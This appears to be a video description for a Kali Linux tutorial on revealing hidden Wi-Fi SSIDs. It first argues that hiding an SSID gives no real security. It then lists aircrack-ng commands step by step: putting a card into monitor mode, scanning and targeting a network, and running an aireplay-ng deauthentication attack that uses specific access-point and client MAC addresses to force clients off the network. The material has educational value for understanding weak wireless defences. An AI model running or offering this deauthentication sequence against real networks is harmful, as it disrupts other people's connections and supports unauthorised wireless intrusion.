Description: Known as security though obscurity many people may hide there ssid's from broadcasting. Just like mac address blocking this is a worthless form of protection. There is nothing secure about hiding your SSID. Its like the wizard hiding behind the curtain. It just does not add any value to your security and like mac address blocking it adds complication with no reward. Today I am going to show you how easy it is to reveal a hidden SSID using Kali Linux. First things first.

0:30 Command 1. airmon-ng
Command 1 will show us what wireless cards are connected to our machine.
0:42 Command 2. airmon-ng start wlan0
Command 2 will place the wireless card listed under airmon-ng into monitor mode.
1:00 Command 3. airodump-ng mon0
Command 3 will allow us to scan for networks around us networks that show up as ect are hidden networks.
1:42 Command 4. airodump-ng -c CH# --bssid BSSIDHERE mon0
Command 4 will allow us just to see any devices connected over the target network replace CH# and BSSIDHERE with target network.
2:19 Command 5. aireplay-ng -0 30 -a BC:F6:85:BF:4F:70 -c 00:24:07:67:20:48 mon0
Command 5 -0 = Attack mode 0 = de-authentication 30 = Indicates the number of deauth packets. -a = Target access point mac address -c = Target client mac address
If you get an error add --ignore-negative-one after mon0
You may need to run Command 5 until the hidden network shows.
